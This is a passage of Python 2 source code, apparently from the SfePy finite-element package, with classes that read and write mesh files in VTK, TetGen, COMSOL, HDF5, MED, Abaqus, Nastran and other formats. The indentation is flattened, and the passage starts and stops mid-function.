if (nr == 1) and (nc == 1):
fd.write('\nSCALARS %s float %d\n' % (key, nc))
fd.write('LOOKUP_TABLE default\n')
format = self.float_format + '\n'
aux = val.data.squeeze()
if len(aux.shape) == 0:
fd.write(format % aux)
else:
for row in aux:
fd.write(format % row)
elif (nr == dim) and (nc == 1):
fd.write('\nVECTORS %s float\n' % key)
if dim == 2:
aux = nm.hstack((val.data.squeeze(),
nm.zeros((ne, 1), dtype=nm.float64)))
else:
aux = val.data
format = self.get_vector_format(3) + '\n'
for row in aux:
fd.write(format % tuple(row.squeeze()))
elif (((nr == sym) or (nr == (dim * dim))) and (nc == 1)) \
or ((nr == dim) and (nc == dim)):
fd.write('\nTENSORS %s float\n' % key)
data = val.data.squeeze()
aux = _reshape_tensors(data, dim, sym, nr)
_write_tensors(aux)
else:
raise NotImplementedError, (nr, nc)
fd.close()
# Mark the write finished.
fd = open(filename, 'r+')
fd.write('#')
fd.close()
def read_data(self, step, filename=None):
"""Point data only!"""
filename = get_default(filename, self.filename)
out = {}
fd = open(self.filename, 'r')
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == 'POINT_DATA':
break
n_nod = int(line[1])
while 1:
line = skip_read_line(fd)
if not line:
break
line = line.split()
if line[0] == 'SCALARS':
name, dtype, nc = line[1:]
assert_(int(nc) == 1)
fd.readline() # skip lookup table line
data = nm.zeros((n_nod,), dtype=nm.float64)
ii = 0
while ii < n_nod:
data[ii] = float(fd.readline())
ii += 1
out[name] = Struct(name=name, mode='vertex', data=data,
dofs=None)
elif line[0] == 'VECTORS':
name, dtype = line[1:]
data = []
ii = 0
while ii < n_nod:
data.append([float(val) for val in fd.readline().split()])
ii += 1
out[name] = Struct(name=name, mode='vertex',
data=nm.array(data, dtype=nm.float64),
dofs=None)
elif line[0] == 'CELL_DATA':
break
line = fd.readline()
fd.close()
return out
class TetgenMeshIO(MeshIO):
format = "tetgen"
def read(self, mesh, **kwargs):
import os
fname = os.path.splitext(self.filename)[0]
nodes = self.getnodes(fname+".node")
etype, elements, regions = self.getele(fname+".ele")
descs = []
conns = []
mat_ids = []
elements = nm.array(elements, dtype=nm.int32) - 1
for key, value in regions.iteritems():
descs.append(etype)
mat_ids.append(nm.ones_like(value) * key)
conns.append(elements[nm.array(value)-1].copy())
mesh._set_io_data(nodes, None, conns, mat_ids, descs)
return mesh
@staticmethod
def getnodes(fnods):
"""
Reads t.1.nodes, returns a list of nodes.
Example:
>>> self.getnodes("t.1.node")
[(0.0, 0.0, 0.0), (4.0, 0.0, 0.0), (0.0, 4.0, 0.0), (-4.0, 0.0, 0.0),
(0.0, 0.0, 4.0), (0.0, -4.0, 0.0), (0.0, -0.0, -4.0), (-2.0, 0.0,
-2.0), (-2.0, 2.0, 0.0), (0.0, 2.0, -2.0), (0.0, -2.0, -2.0), (2.0,
0.0, -2.0), (2.0, 2.0, 0.0), ... ]
"""
f = open(fnods)
l = [int(x) for x in f.readline().split()]
npoints, dim, nattrib, nbound = l
if dim == 2:
ndapp = [0.0]
else:
ndapp = []
nodes = []
for line in f:
if line[0] == "#": continue
l = [float(x) for x in line.split()]
l = l[:(dim + 1)]
assert_(int(l[0]) == len(nodes)+1)
l = l[1:]
nodes.append(tuple(l + ndapp))
assert_(npoints == len(nodes))
return nodes
@staticmethod
def getele(fele):
"""
Reads t.1.ele, returns a list of elements.
Example:
>>> elements, regions = self.getele("t.1.ele")
>>> elements
[(20, 154, 122, 258), (86, 186, 134, 238), (15, 309, 170, 310), (146,
229, 145, 285), (206, 207, 125, 211), (99, 193, 39, 194), (185, 197,
158, 225), (53, 76, 74, 6), (19, 138, 129, 313), (23, 60, 47, 96),
(119, 321, 1, 329), (188, 296, 122, 322), (30, 255, 177, 256), ...]
>>> regions
{100: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54,
55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 7, ...],
...}
"""
f = file(fele)
l = [int(x) for x in f.readline().split()]
ntetra,nnod,nattrib = l
#we have either linear or quadratic tetrahedra:
elem = None
if nnod in [4,10]:
elem = '3_4'
linear = (nnod == 4)
if nnod in [3, 7]:
elem = '2_3'
linear = (nnod == 3)
if elem is None or not linear:
raise ValueError("Only linear triangle and tetrahedra reader"
" is implemented")
els = []
regions = {}
for line in f:
if line[0] == "#": continue
l = [int(x) for x in line.split()]
if elem == '2_3':
assert_((len(l) - 1 - nattrib) == 3)
els.append((l[1],l[2],l[3]))
if elem == '3_4':
assert_((len(l) - 1 - nattrib) == 4)
els.append((l[1],l[2],l[3],l[4]))
if nattrib == 1:
regionnum = l[-1]
else:
regionnum = 1
if regionnum == 0:
msg = "see %s, element # %d\n"%(fele,l[0])
msg += "there are elements not belonging to any physical entity"
raise ValueError(msg)
if regions.has_key(regionnum):
regions[regionnum].append(l[0])
else:
regions[regionnum]=[l[0]]
assert_(l[0] == len(els))
return elem, els, regions
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
def read_dimension(self):
# TetGen only supports 3D mesh
return 3
def read_bounding_box(self):
raise NotImplementedError
class ComsolMeshIO(MeshIO):
format = 'comsol'
def _read_commented_int(self):
return int(skip_read_line(self.fd).split('#')[0])
def _skip_comment(self):
read_token(self.fd)
self.fd.readline()
def read(self, mesh, **kwargs):
self.fd = fd = open(self.filename, 'r')
mode = 'header'
coors = conns = None
while 1:
if mode == 'header':
line = skip_read_line(fd)
n_tags = self._read_commented_int()
for ii in xrange(n_tags):
skip_read_line(fd)
n_types = self._read_commented_int()
for ii in xrange(n_types):
skip_read_line(fd)
skip_read_line(fd)
assert_(skip_read_line(fd).split()[1] == 'Mesh')
skip_read_line(fd)
dim = self._read_commented_int()
assert_((dim == 2) or (dim == 3))
n_nod = self._read_commented_int()
i0 = self._read_commented_int()
mode = 'points'
elif mode == 'points':
self._skip_comment()
coors = read_array(fd, n_nod, dim, nm.float64)
mode = 'cells'
elif mode == 'cells':
n_types = self._read_commented_int()
conns = []
descs = []
mat_ids = []
for it in xrange(n_types):
t_name = skip_read_line(fd).split()[1]
n_ep = self._read_commented_int()
n_el = self._read_commented_int()
self._skip_comment()
aux = read_array(fd, n_el, n_ep, nm.int32)
if t_name == 'tri':
conns.append(aux)
descs.append('2_3')
is_conn = True
elif t_name == 'quad':
# Rearrange element node order to match SfePy.
aux = aux[:,(0,1,3,2)]
conns.append(aux)
descs.append('2_4')
is_conn = True
elif t_name == 'hex':
# Rearrange element node order to match SfePy.
aux = aux[:,(0,1,3,2,4,5,7,6)]
conns.append(aux)
descs.append('3_8')
is_conn = True
elif t_name == 'tet':
conns.append(aux)
descs.append('3_4')
is_conn = True
else:
is_conn = False
# Skip parameters.
n_pv = self._read_commented_int()
n_par = self._read_commented_int()
for ii in xrange(n_par):
skip_read_line(fd)
n_domain = self._read_commented_int()
assert_(n_domain == n_el)
if is_conn:
self._skip_comment()
mat_id = read_array(fd, n_domain, 1, nm.int32)
mat_ids.append(mat_id)
else:
for ii in xrange(n_domain):
skip_read_line(fd)
# Skip up/down pairs.
n_ud = self._read_commented_int()
for ii in xrange(n_ud):
skip_read_line(fd)
break
fd.close()
self.fd = None
mesh._set_io_data(coors, None, conns, mat_ids, descs)
return mesh
def write(self, filename, mesh, out=None, **kwargs):
def write_elements(fd, ig, conn, mat_ids, type_name,
npe, format, norder, nm_params):
fd.write("# Type #%d\n\n" % ig)
fd.write("%s # type name\n\n\n" % type_name)
fd.write("%d # number of nodes per element\n" % npe)
fd.write("%d # number of elements\n" % conn.shape[0])
fd.write("# Elements\n")
for ii in range(conn.shape[0]):
nn = conn[ii] # Zero based
fd.write(format % tuple(nn[norder]))
fd.write("\n%d # number of parameter values per element\n"
% nm_params)
# Top level always 0?
fd.write("0 # number of parameters\n")
fd.write("# Parameters\n\n")
fd.write("%d # number of domains\n"
% sum([mi.shape[0] for mi in mat_ids]))
fd.write("# Domains\n")
for mi in mat_ids:
# Domains in comsol have to be > 0
if (mi <= 0).any():
mi += mi.min() + 1
for dom in mi:
fd.write("%d\n" % abs(dom))
fd.write("\n0 # number of up/down pairs\n")
fd.write("# Up/down\n")
fd = open(filename, 'w')
coors, ngroups, conns, mat_ids, desc = mesh._get_io_data()
n_nod, dim = coors.shape
# Header
fd.write("# Created by SfePy\n\n\n")
fd.write("# Major & minor version\n")
fd.write("0 1\n")
fd.write("1 # number of tags\n")
fd.write("# Tags\n")
fd.write("2 m1\n")
fd.write("1 # number of types\n")
fd.write("# Types\n")
fd.write("3 obj\n\n")
# Record
fd.write("# --------- Object 0 ----------\n\n")
fd.write("0 0 1\n") # version unused serializable
fd.write("4 Mesh # class\n")
fd.write("1 # version\n")
fd.write("%d # sdim\n" % dim)
fd.write("%d # number of mesh points\n" % n_nod)
fd.write("0 # lowest mesh point index\n\n") # Always zero in SfePy
fd.write("# Mesh point coordinates\n")
format = self.get_vector_format(dim) + '\n'
for ii in range(n_nod):
nn = tuple(coors[ii])
fd.write(format % tuple(nn))
fd.write("\n%d # number of element types\n\n\n" % len(conns))
for ig, conn in enumerate(conns):
if (desc[ig] == "2_4"):
write_elements(fd, ig, conn, mat_ids,
"4 quad", 4, "%d %d %d %d\n", [0, 1, 3, 2], 8)
elif (desc[ig] == "2_3"):
# TODO: Verify number of parameters for tri element
write_elements(fd, ig, conn, mat_ids,
"3 tri", 3, "%d %d %d\n", [0, 1, 2], 4)
elif (desc[ig] == "3_4"):
# TODO: Verify number of parameters for tet element
write_elements(fd, ig, conn, mat_ids,
"3 tet", 4, "%d %d %d %d\n", [0, 1, 2, 3], 16)
elif (desc[ig] == "3_8"):
write_elements(fd, ig, conn, mat_ids,
"3 hex", 8, "%d %d %d %d %d %d %d %d\n",
[0, 1, 3, 2, 4, 5, 7, 6], 24)
else:
raise ValueError('unknown element type! (%s)' % desc[ig])
fd.close()
if out is not None:
for key, val in out.iteritems():
raise NotImplementedError
class HDF5MeshIO(MeshIO):
format = "hdf5"
import string
_all = ''.join(map(chr, range(256)))
_letters = string.letters + string.digits + '_'
_rubbish = ''.join([ch for ch in set(_all) - set(_letters)])
_tr = string.maketrans(_rubbish, '_' * len(_rubbish))
def read_dimension(self, ret_fd=False):
fd = pt.openFile(self.filename, mode="r")
dim = fd.root.mesh.coors.shape[1]
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
fd = pt.openFile(self.filename, mode="r")
mesh_group = fd.root.mesh
coors = mesh_group.coors.read()
bbox = nm.vstack((nm.amin(coors, 0),
nm.amax(coors, 0)))
if ret_dim:
dim = coors.shape[1]
if ret_fd:
return bbox, dim, fd
else:
fd.close()
return bbox, dim
else:
if ret_fd:
return bbox, fd
else:
fd.close()
return bbox
def read(self, mesh, **kwargs):
fd = pt.openFile(self.filename, mode="r")
mesh_group = fd.root.mesh
mesh.name = mesh_group.name.read()
coors = mesh_group.coors.read()
ngroups = mesh_group.ngroups.read()
n_gr = mesh_group.n_gr.read()
conns = []
descs = []
mat_ids = []
for ig in xrange(n_gr):
gr_name = 'group%d' % ig
group = mesh_group._f_getChild(gr_name)
conns.append(group.conn.read())
mat_ids.append(group.mat_id.read())
descs.append(group.desc.read())
nodal_bcs = {}
try:
node_sets_groups = mesh_group.node_sets
except:
pass
else:
for group in node_sets_groups:
key = group.key.read()
nods = group.nods.read()
nodal_bcs[key] = nods
fd.close()
mesh._set_io_data(coors, ngroups, conns, mat_ids, descs,
nodal_bcs=nodal_bcs)
return mesh
def write(self, filename, mesh, out=None, ts=None, **kwargs):
from time import asctime
if pt is None:
raise ValueError('pytables not imported!')
step = get_default_attr(ts, 'step', 0)
if step == 0:
# A new file.
fd = pt.openFile(filename, mode="w",
title="SfePy output file")
mesh_group = fd.createGroup('/', 'mesh', 'mesh')
coors, ngroups, conns, mat_ids, descs = mesh._get_io_data()
fd.createArray(mesh_group, 'name', mesh.name, 'name')
fd.createArray(mesh_group, 'coors', coors, 'coors')
fd.createArray(mesh_group, 'ngroups', ngroups, 'ngroups')
fd.createArray(mesh_group, 'n_gr', len(conns), 'n_gr')
for ig, conn in enumerate(conns):
conn_group = fd.createGroup(mesh_group, 'group%d' % ig,
'connectivity group')
fd.createArray(conn_group, 'conn', conn, 'connectivity')
fd.createArray(conn_group, 'mat_id', mat_ids[ig],
'material id')
fd.createArray(conn_group, 'desc', descs[ig],
'element Type')
node_sets_groups = fd.createGroup(mesh_group, 'node_sets',
'node sets groups')
ii = 0
for key, nods in mesh.nodal_bcs.iteritems():
group = fd.createGroup(node_sets_groups, 'group%d' % ii,
'node sets group')
fd.createArray(group, 'key', key, 'key')
fd.createArray(group, 'nods', nods, 'nods')
ii += 1
if ts is not None:
ts_group = fd.createGroup('/', 'ts', 'time stepper')
fd.createArray(ts_group, 't0', ts.t0, 'initial time')
fd.createArray(ts_group, 't1', ts.t1, 'final time' )
fd.createArray(ts_group, 'dt', ts.dt, 'time step')
fd.createArray(ts_group, 'n_step', ts.n_step, 'n_step')
tstat_group = fd.createGroup('/', 'tstat', 'global time statistics')
fd.createArray(tstat_group, 'created', asctime(),
'file creation time')
fd.createArray(tstat_group, 'finished', '.' * 24,
'file closing time')
fd.createArray(fd.root, 'last_step', nm.array([0], dtype=nm.int32),
'last saved step')
fd.close()
if out is not None:
if ts is None:
step, time, nt = 0, 0.0, 0.0
else:
step, time, nt = ts.step, ts.time, ts.nt
# Existing file.
fd = pt.openFile(filename, mode="r+")
step_group = fd.createGroup('/', 'step%d' % step, 'time step data')
ts_group = fd.createGroup(step_group, 'ts', 'time stepper')
fd.createArray(ts_group, 'step', step, 'step')
fd.createArray(ts_group, 't', time, 'time')
fd.createArray(ts_group, 'nt', nt, 'normalized time')
name_dict = {}
for key, val in out.iteritems():
shape = val.get('shape', val.data.shape)
dofs = val.get('dofs', None)
if dofs is None:
dofs = [''] * nm.squeeze(shape)[-1]
var_name = val.get('var_name', '')
name = val.get('name', 'output_data')
group_name = '__' + key.translate(self._tr)
data_group = fd.createGroup(step_group, group_name,
'%s data' % key)
fd.createArray(data_group, 'data', val.data, 'data')
fd.createArray(data_group, 'mode', val.mode, 'mode')
fd.createArray(data_group, 'dofs', dofs, 'dofs')
fd.createArray(data_group, 'shape', shape, 'shape')
fd.createArray(data_group, 'name', name, 'object name')
fd.createArray(data_group, 'var_name',
var_name, 'object parent name')
fd.createArray(data_group, 'dname', key, 'data name')
if val.mode == 'full':
fd.createArray(data_group, 'field_name', val.field_name,
'field name')
name_dict[key] = group_name
step_group._v_attrs.name_dict = name_dict
fd.root.last_step[0] = step
fd.removeNode(fd.root.tstat.finished)
fd.createArray(fd.root.tstat, 'finished', asctime(),
'file closing time')
fd.close()
def read_last_step(self, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
last_step = fd.root.last_step[0]
fd.close()
return last_step
def read_time_stepper(self, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
try:
ts_group = fd.root.ts
out = (ts_group.t0.read(), ts_group.t1.read(),
ts_group.dt.read(), ts_group.n_step.read())
except:
raise ValueError('no time stepper found!')
finally:
fd.close()
return out
def read_times(self, filename=None):
"""
Read true time step data from individual time steps.
Returns
-------
steps : array
The time steps.
times : array
The times of the time steps.
nts : array
The normalized times of the time steps, in [0, 1].
"""
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode='r')
steps = sorted(int(name[4:]) for name in fd.root._v_groups.keys()
if name.startswith('step'))
times = []
nts = []
for step in steps:
ts_group = fd.getNode(fd.root, 'step%d/ts' % step)
times.append(ts_group.t.read())
nts.append(ts_group.nt.read())
fd.close()
steps = nm.asarray(steps, dtype=nm.int32)
times = nm.asarray(times, dtype=nm.float64)
nts = nm.asarray(nts, dtype=nm.float64)
return steps, times, nts
def _get_step_group(self, step, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
gr_name = 'step%d' % step
try:
step_group = fd.getNode(fd.root, gr_name)
except:
output('step %d data not found - premature end of file?' % step)
fd.close()
return None, None
return fd, step_group
def read_data(self, step, filename=None):
fd, step_group = self._get_step_group(step, filename=filename)
if fd is None: return None
out = {}
for data_group in step_group:
try:
key = data_group.dname.read()
except pt.exceptions.NoSuchNodeError:
continue
name = data_group.name.read()
mode = data_group.mode.read()
data = data_group.data.read()
dofs = tuple(data_group.dofs.read())
try:
shape = tuple(data_group.shape.read())
except pt.exceptions.NoSuchNodeError:
shape = data.shape
if mode == 'full':
field_name = data_group.field_name.read()
else:
field_name = None
out[key] = Struct(name=name, mode=mode, data=data,
dofs=dofs, shape=shape, field_name=field_name)
if out[key].dofs == (-1,):
out[key].dofs = None
fd.close()
return out
def read_data_header(self, dname, step=0, filename=None):
fd, step_group = self._get_step_group(step, filename=filename)
if fd is None: return None
groups = step_group._v_groups
for name, data_group in groups.iteritems():
try:
key = data_group.dname.read()
except pt.exceptions.NoSuchNodeError:
continue
if key == dname:
mode = data_group.mode.read()
fd.close()
return mode, name
fd.close()
raise KeyError('non-existent data: %s' % dname)
def read_time_history(self, node_name, indx, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
th = dict_from_keys_init(indx, list)
for step in xrange(fd.root.last_step[0] + 1):
gr_name = 'step%d' % step
step_group = fd.getNode(fd.root, gr_name)
data = step_group._f_getChild(node_name).data
for ii in indx:
th[ii].append(nm.array(data[ii]))
fd.close()
for key, val in th.iteritems():
aux = nm.array(val)
if aux.ndim == 4: # cell data.
aux = aux[:,0,:,0]
th[key] = aux
return th
def read_variables_time_history(self, var_names, ts, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
assert_((fd.root.last_step[0] + 1) == ts.n_step)
ths = dict_from_keys_init(var_names, list)
arr = nm.asarray
for step in xrange(ts.n_step):
gr_name = 'step%d' % step
step_group = fd.getNode(fd.root, gr_name)
name_dict = step_group._v_attrs.name_dict
for var_name in var_names:
data = step_group._f_getChild(name_dict[var_name]).data
ths[var_name].append(arr(data.read()))
fd.close()
return ths
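# A minimal usage sketch for HDF5MeshIO (illustration only, not part of the
# module API): 'output.h5' is a placeholder for a results file previously
# written by this class, and pytables must be available.
def _example_hdf5_usage(filename='output.h5'):
    io = HDF5MeshIO(filename)
    steps, times, nts = io.read_times()
    last_step = io.read_last_step()
    data = io.read_data(last_step)
    return steps, times, nts, data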
class MEDMeshIO(MeshIO):
format = "med"
def read(self, mesh, **kwargs):
fd = pt.openFile(self.filename, mode="r")
mesh_root = fd.root.ENS_MAA
#TODO: Loop through multiple meshes?
mesh_group = mesh_root._f_getChild(mesh_root._v_groups.keys()[0])
if not ('NOE' in mesh_group._v_groups.keys()):
mesh_group = mesh_group._f_getChild(mesh_group._v_groups.keys()[0])
mesh.name = mesh_group._v_name
aux_coors = mesh_group.NOE.COO.read()
n_nodes = mesh_group.NOE.COO.getAttr('NBR')
# Unflatten the node coordinate array
dim = aux_coors.shape[0] / n_nodes
coors = nm.zeros((n_nodes,dim), dtype=nm.float64)
for ii in range(dim):
coors[:,ii] = aux_coors[n_nodes*ii:n_nodes*(ii+1)]
ngroups = mesh_group.NOE.FAM.read()
assert_((ngroups >= 0).all())
# Dict to map MED element names to SfePy descs
#NOTE: The commented lines are elements which
# produce KeyError in SfePy
med_descs = {
'TE4' : '3_4',
#'T10' : '3_10',
#'PY5' : '3_5',
#'P13' : '3_13',
'HE8' : '3_8',
#'H20' : '3_20',
#'PE6' : '3_6',
#'P15' : '3_15',
#TODO: Polyhedrons (POE) - need special handling
'TR3' : '2_3',
#'TR6' : '2_6',
'QU4' : '2_4',
#'QU8' : '2_8',
#TODO: Polygons (POG) - need special handling
#'SE2' : '1_2',
#'SE3' : '1_3',
}
conns = []
descs = []
mat_ids = []
for md, desc in med_descs.iteritems():
if int(desc[0]) != dim: continue
try:
group = mesh_group.MAI._f_getChild(md)
aux_conn = group.NOD.read()
n_conns = group.NOD.getAttr('NBR')
# (0 based indexing in numpy vs. 1 based in MED)
nne = aux_conn.shape[0] / n_conns
conn = nm.zeros((n_conns,nne), dtype=nm.int32)
for ii in range(nne):
conn[:,ii] = aux_conn[n_conns*ii:n_conns*(ii+1)] - 1
conns.append(conn)
mat_id = group.FAM.read()
assert_((mat_id <= 0).all())
mat_id = nm.abs(mat_id)
mat_ids.append(mat_id)
descs.append(med_descs[md])
except pt.exceptions.NoSuchNodeError:
pass
fd.close()
mesh._set_io_data(coors, ngroups, conns, mat_ids, descs)
return mesh
class Mesh3DMeshIO(MeshIO):
format = "mesh3d"
def read(self, mesh, **kwargs):
f = open(self.filename)
# read the whole file:
vertices = self._read_section(f, integer=False)
tetras = self._read_section(f)
hexes = self._read_section(f)
prisms = self._read_section(f)
tris = self._read_section(f)
quads = self._read_section(f)
        # subtract 1 from all elements, because we count from 0:
conns = []
mat_ids = []
descs = []
if len(tetras) > 0:
conns.append(tetras - 1)
mat_ids.append([0]*len(tetras))
descs.append("3_4")
if len(hexes) > 0:
conns.append(hexes - 1)
mat_ids.append([0]*len(hexes))
descs.append("3_8")
mesh._set_io_data(vertices, None, conns, mat_ids, descs)
return mesh
def read_dimension(self):
return 3
def _read_line(self, f):
"""
        Reads one non-empty line, skipping comments.
"""
l = f.readline().strip()
while l == "" or l[0] == "#": # comment or an empty line
l = f.readline().strip()
return l
def _read_section(self, f, integer=True):
"""
Reads one section from the mesh3d file.
integer ... if True, all numbers are passed to int(), otherwise to
float(), before returning
Some examples how a section can look like:
2
1 2 5 4 7 8 11 10
2 3 6 5 8 9 12 11
or
5
1 2 3 4 1
1 2 6 5 1
2 3 7 6 1
3 4 8 7 1
4 1 5 8 1
or
0
"""
if integer:
dtype=int
else:
dtype=float
l = self._read_line(f)
N = int(l)
rows = []
for i in range(N):
l = self._read_line(f)
row = nm.fromstring(l, sep=" ", dtype=dtype)
rows.append(row)
return nm.array(rows)
def mesh_from_groups(mesh, ids, coors, ngroups,
tris, mat_tris, quads, mat_quads,
tetras, mat_tetras, hexas, mat_hexas, remap=None):
ids = nm.asarray(ids, dtype=nm.int32)
coors = nm.asarray(coors, dtype=nm.float64)
if remap is None:
n_nod = coors.shape[0]
remap = nm.zeros((ids.max()+1,), dtype=nm.int32)
remap[ids] = nm.arange(n_nod, dtype=nm.int32)
tris = remap[nm.array(tris, dtype=nm.int32)]
quads = remap[nm.array(quads, dtype=nm.int32)]
tetras = remap[nm.array(tetras, dtype=nm.int32)]
hexas = remap[nm.array(hexas, dtype=nm.int32)]
conns = [tris, quads, tetras, hexas]
mat_ids = [nm.array(ar, dtype=nm.int32)
for ar in [mat_tris, mat_quads, mat_tetras, mat_hexas]]
descs = ['2_3', '2_4', '3_4', '3_8']
# Remove empty groups.
conns, mat_ids, descs = zip(*[(conns[ig], mat_ids[ig], descs[ig])
for ig in xrange(4)
if conns[ig].shape[0] > 0])
mesh._set_io_data(coors, ngroups, conns, mat_ids, descs)
return mesh
class AVSUCDMeshIO(MeshIO):
format = 'avs_ucd'
@staticmethod
def guess(filename):
return True
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
# Skip all comments.
while 1:
line = fd.readline()
if line and (line[0] != '#'):
break
header = [int(ii) for ii in line.split()]
n_nod, n_el = header[0:2]
ids = nm.zeros((n_nod,), dtype=nm.int32)
dim = 3
coors = nm.zeros((n_nod, dim), dtype=nm.float64)
for ii in xrange(n_nod):
line = fd.readline().split()
ids[ii] = int(line[0])
coors[ii] = [float(coor) for coor in line[1:]]
mat_tetras = []
tetras = []
mat_hexas = []
hexas = []
for ii in xrange(n_el):
line = fd.readline().split()
if line[2] == 'tet':
mat_tetras.append(int(line[1]))
tetras.append([int(ic) for ic in line[3:]])
elif line[2] == 'hex':
mat_hexas.append(int(line[1]))
hexas.append([int(ic) for ic in line[3:]])
fd.close()
mesh = mesh_from_groups(mesh, ids, coors, None,
[], [], [], [],
tetras, mat_tetras, hexas, mat_hexas)
return mesh
def read_dimension(self):
return 3
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class HypermeshAsciiMeshIO(MeshIO):
format = 'hmascii'
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
ids = []
coors = []
tetras = []
mat_tetras = []
hexas = []
mat_hexas = []
quads = []
mat_quads = []
trias = []
mat_trias = []
mat_id = 0
for line in fd:
if line and (line[0] == '*'):
if line[1:10] == 'component':
line = line.strip()[11:-1].split(',')
mat_id = int(line[0])
if line[1:5] == 'node':
line = line.strip()[6:-1].split(',')
ids.append(int(line[0]))
coors.append([float(coor) for coor in line[1:4]])
elif line[1:7] == 'tetra4':
line = line.strip()[8:-1].split(',')
mat_tetras.append(mat_id)
tetras.append([int(ic) for ic in line[2:6]])
elif line[1:6] == 'hexa8':
line = line.strip()[7:-1].split(',')
mat_hexas.append(mat_id)
hexas.append([int(ic) for ic in line[2:10]])
elif line[1:6] == 'quad4':
line = line.strip()[7:-1].split(',')
mat_quads.append(mat_id)
quads.append([int(ic) for ic in line[2:6]])
elif line[1:6] == 'tria3':
line = line.strip()[7:-1].split(',')
mat_trias.append(mat_id)
trias.append([int(ic) for ic in line[2:5]])
fd.close()
mesh = mesh_from_groups(mesh, ids, coors, None,
trias, mat_trias, quads, mat_quads,
tetras, mat_tetras, hexas, mat_hexas)
return mesh
def read_dimension(self):
return 3
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class AbaqusMeshIO(MeshIO):
format = 'abaqus'
@staticmethod
def guess(filename):
ok = False
fd = open(filename, 'r')
for ii in xrange(100):
try:
line = fd.readline().strip().split(',')
except:
break
if line[0].lower() == '*node':
ok = True
break
fd.close()
return ok
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
ids = []
coors = []
tetras = []
mat_tetras = []
hexas = []
mat_hexas = []
tris = []
mat_tris = []
quads = []
mat_quads = []
nsets = {}
ing = 1
dim = 0
line = fd.readline().split(',')
while 1:
if not line[0]: break
token = line[0].strip().lower()
if token == '*node':
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
if dim == 0:
dim = len(line) - 1
ids.append(int(line[0]))
if dim == 2:
coors.append([float(coor) for coor in line[1:3]])
else:
coors.append([float(coor) for coor in line[1:4]])
elif token == '*element':
if line[1].find('C3D8') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_hexas.append(0)
hexas.append([int(ic) for ic in line[1:9]])
elif line[1].find('C3D4') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_tetras.append(0)
tetras.append([int(ic) for ic in line[1:5]])
elif line[1].find('CPS') >= 0 or line[1].find('CPE') >= 0:
if line[1].find('4') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_quads.append(0)
quads.append([int(ic) for ic in line[1:5]])
elif line[1].find('3') >= 0:
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
mat_tris.append(0)
tris.append([int(ic) for ic in line[1:4]])
else:
raise ValueError('unknown element type! (%s)' % line[1])
else:
raise ValueError('unknown element type! (%s)' % line[1])
elif token == '*nset':
if line[-1].strip().lower() == 'generate':
line = fd.readline()
continue
while 1:
line = fd.readline().strip().split(',')
if (not line[0]) or (line[0][0] == '*'): break
if not line[-1]: line = line[:-1]
aux = [int(ic) for ic in line]
nsets.setdefault(ing, []).extend(aux)
ing += 1
else:
line = fd.readline().split(',')
fd.close()
ngroups = nm.zeros((len(coors),), dtype=nm.int32)
for ing, ii in nsets.iteritems():
ngroups[nm.array(ii)-1] = ing
mesh = mesh_from_groups(mesh, ids, coors, ngroups,
tris, mat_tris, quads, mat_quads,
tetras, mat_tetras, hexas, mat_hexas)
return mesh
def read_dimension(self):
fd = open(self.filename, 'r')
line = fd.readline().split(',')
while 1:
if not line[0]: break
token = line[0].strip().lower()
if token == '*node':
while 1:
line = fd.readline().split(',')
if (not line[0]) or (line[0][0] == '*'): break
dim = len(line) - 1
fd.close()
return dim
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class BDFMeshIO(MeshIO):
format = 'nastran'
def read_dimension(self, ret_fd=False):
fd = open(self.filename, 'r')
el3d = 0
while 1:
try:
line = fd.readline()
except:
output("reading " + fd.name + " failed!")
raise
if len(line) == 1: continue
if line[0] == '$': continue
aux = line.split()
if aux[0] == 'CHEXA':
el3d += 1
elif aux[0] == 'CTETRA':
el3d += 1
if el3d > 0:
dim = 3
else:
dim = 2
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read(self, mesh, **kwargs):
def mfloat(s):
if len(s) > 3:
if s[-3] == '-':
return float(s[:-3]+'e'+s[-3:])
return float(s)
import string
fd = open(self.filename, 'r')
el = {'3_8' : [], '3_4' : [], '2_4' : [], '2_3' : []}
nod = []
cmd = ''
dim = 2
conns_in = []
descs = []
node_grp = None
while 1:
try:
line = fd.readline()
except EOFError:
break
except:
output("reading " + fd.name + " failed!")
raise
if (len(line) == 0): break
if len(line) < 4: continue
if line[0] == '$': continue
row = line.strip().split()
if row[0] == 'GRID':
cs = line.strip()[-24:]
aux = [ cs[0:8], cs[8:16], cs[16:24] ]
nod.append([mfloat(ii) for ii in aux]);
elif row[0] == 'GRID*':
aux = row[1:4];
cmd = 'GRIDX';
elif row[0] == 'CHEXA':
aux = [int(ii)-1 for ii in row[3:9]]
aux2 = int(row[2])
aux3 = row[9]
cmd ='CHEXAX'
elif row[0] == 'CTETRA':
aux = [int(ii)-1 for ii in row[3:]]
